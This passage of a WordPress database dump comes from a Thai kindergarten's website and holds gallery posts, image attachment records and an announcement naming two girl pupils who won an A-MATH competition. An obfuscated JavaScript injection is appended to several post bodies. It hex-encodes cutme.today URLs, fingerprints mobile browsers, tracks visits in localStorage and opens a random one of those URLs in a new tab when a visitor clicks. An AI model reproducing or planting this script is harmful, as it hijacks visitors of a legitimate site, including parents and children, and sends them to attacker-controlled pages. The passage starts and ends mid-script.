)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 19:09:06','2024-07-29 12:09:06','',19,'http://watprato.ssk.in.th/?p=154',0,'revision','',0),
(158,1,'2024-08-06 13:25:42','2024-08-06 06:25:42','<!-- wp:generateblocks/container {\"uniqueId\":\"250207dd\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":171,\"sizeSlug\":\"large\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/454010015_122167799234202781_6887725117770515048_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-171\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":185,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/453971114_122167799222202781_3841640128629440766_n-1-1024x1024.jpg\" alt=\"\" class=\"wp-image-185\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":186,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/454267525_122167799384202781_905961670854441852_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-186\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การแข่งขัน A-MATH ประจำปี 2567 โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับนักเรียนคนเก่ง ✨ เด็กหญิงกชพรรณ ชาตรูปไพศาล เด็กหญิงศศินิภา ทองพิทักษ์ ได้รับรางวัลชนะเลิศการแข่งขัน A-MATH ประจาปี 2567 “ฝึกความคิดพิชิตสมอง ท้าประลอง A-MATH” ระดับประถมศึกษาปีที่ 1-6 จัดโดย สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1','','publish','open','open','','158','','','2024-08-15 10:54:50','2024-08-15 03:54:50','',0,'http://watprato.ssk.in.th/?p=158',0,'post','',0),
(159,1,'2024-08-06 13:22:58','2024-08-06 06:22:58','','453971114_122167799222202781_3841640128629440766_n','','inherit','open','closed','','453971114_122167799222202781_3841640128629440766_n','','','2024-08-06 13:22:58','2024-08-06 06:22:58','',158,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/453971114_122167799222202781_3841640128629440766_n.jpg',0,'attachment','image/jpeg',0),
(160,1,'2024-08-06 13:23:25','2024-08-06 06:23:25','','453848866_122167799348202781_4165394554637799009_n','','inherit','open','closed','','453848866_122167799348202781_4165394554637799009_n','','','2024-08-06 13:23:25','2024-08-06 06:23:25','',158,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/453848866_122167799348202781_4165394554637799009_n.jpg',0,'attachment','image/jpeg',0),
(161,1,'2024-08-06 13:23:28','2024-08-06 06:23:28','','454267525_122167799384202781_905961670854441852_n','','inherit','open','closed','','454267525_122167799384202781_905961670854441852_n','','','2024-08-06 13:23:28','2024-08-06 06:23:28','',158,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/454267525_122167799384202781_905961670854441852_n.jpg',0,'attachment','image/jpeg',0),
(162,1,'2024-08-06 13:23:30','2024-08-06 06:23:30','','454010015_122167799234202781_6887725117770515048_n','','inherit','open','closed','','454010015_122167799234202781_6887725117770515048_n','','','2024-08-06 13:23:30','2024-08-06 06:23:30','',158,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/454010015_122167799234202781_6887725117770515048_n.jpg',0,'attachment','image/jpeg',0),
(163,1,'2024-08-06 13:23:32','2024-08-06 06:23:32','','454032909_122167799336202781_3575994108604847462_n','','inherit','open','closed','','454032909_122167799336202781_3575994108604847462_n','','','2024-08-06 13:23:32','2024-08-06 06:23:32','',158,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/454032909_122167799336202781_3575994108604847462_n.jpg',0,'attachment','image/jpeg',0),
(164,1,'2024-08-06 13:24:50','2024-08-06 06:24:50','<!-- wp:paragraph -->\n<p>โรงเรียนอนุบาลวัดพระโต</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ขอแสดงความยินดีกับนักเรียนคนเก่ง <img height=\"16\" width=\"16\" alt=\"✨\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tf4/1/16/2728.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เด็กหญิงกชพรรณ ชาตรูปไพศาล</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เด็กหญิงศศินิภา ทองพิทักษ์</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ได้รับรางวัลชนะเลิศการแข่งขัน A-MATH ประจาปี 2567 “ฝึกความคิดพิชิตสมอง ท้าประลอง A-MATH” ระดับประถมศึกษาปีที่ 1-6</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a>จัดโดย สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 